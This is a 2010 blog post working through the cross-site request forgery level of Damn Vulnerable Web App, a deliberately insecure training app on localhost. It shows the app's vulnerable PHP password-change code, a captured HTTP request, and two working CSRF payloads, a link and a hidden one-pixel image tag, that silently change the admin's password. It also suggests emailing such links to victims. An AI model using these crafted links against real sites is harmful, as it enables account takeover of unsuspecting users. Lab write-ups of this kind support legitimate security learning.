Cross Site Request Forgery

June 3, 2010 at 11:24 pm (CSRF, PHP, Security)

Hey,

So I just had a play with the Cross Site Request Forgery level in Damn Vulnerable Web App. Very simple attack. You basically craft a URL that you can send to your victim that when he or she clicks will inherit the identity of the victim authenticated with the site and perform the malicious actions provided by the crafted URL. So with out further a do, lets take a look at the code:

<?php

if (isset($_GET['Change'])) {

// Turn requests into variables
$pass_new = $_GET['password_new'];
$pass_conf = $_GET['password_conf'];

if (($pass_new == $pass_conf)){
$pass_new = mysql_real_escape_string($pass_new);
$pass_new = md5($pass_new);

$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );

echo "<pre> Password Changed </pre>";
mysql_close();
}

else{
echo "<pre> Passwords did not match. </pre>";
}

}
?>

If you can somehow bypass the mysql_real_escape_string() (which I know is possible) and the md5() (I am not sure if there is a way around this, as it turns the string to an MD5 hash), then you have a simple SQL Injection lurking underneath. If anyone has been able to perform an SQL Injection on the above code please let me know. Anyway back to the CSRF. Looking at the code and by using Burpsuite to intercept the HTTP requests we can see that the password is passed over in the URL, lets take a look at the HTTP Request:

GET /dvwa/vulnerabilities/csrf/?password_new=mynewpasswd&password_conf=mynewpasswd&Change=Change HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Proxy-Connection: keep-alive

Referer: http://localhost/dvwa/vulnerabilities/csrf/?password_new=%21a2e0n23&password_conf=%21a2e0n23&Change=Change

Cookie: security=low; PHPSESSID=986e59f304b93ce9287b9cbc84df6a1d

The bit we are interested in is:

GET /dvwa/vulnerabilities/csrf/?password_new=mynewpasswd&password_conf=mynewpasswd&Change=Change HTTP/1.1

Now this is interesting, we can construct a URL like the above, and hide it in some HTML craft an email and send it to the unsuspecting admin. When the admin opens the email, and clicks the link it will change his password. You can hide it better in image links too which we will see in a minute. The idea is to basically craft the URL that enables you to perform a function on the vulnerable website, whether that is change a password, post a comment, log the user out, whatever it is you mask the actual HTTP request in some ordinary looking code and send it to the victim in an email, IM, or a link on the attackers website.. it can be anything, you imagination is your limit 🙂

I made two simple links that did the job nicely:

<a href="http://localhost/dvwa/vulnerabilities/csrf/?password_new=abcd&password_conf=abcd&Change=Change">Click Here</a>
<img src="http://localhost/dvwa/vulnerabilities/csrf/?password_new=abcd&password_conf=abcd&Change=Change" width="1" height="1" border="0">

A nice way to visualize this attack in the wild would be to think of for example Facebook, it has in the past had its CSRF vulnerabilities I am sure. Imagine you found a CSRF vulnerability in Facebook, that allowed you to craft a URL to post comments.. So when a user post a comment on Facebook, it generates it and sends it in the URL. Well you the attacker could craft a URL that posted a malicious comment, send this across the site to the victim using the private messaging system, hidden in an obscured link. The victim would click the link and it would post the malicious comment you crafted.

These attacks can be used for all kinds of nasty things.

Advertisements

Permalink Leave a Comment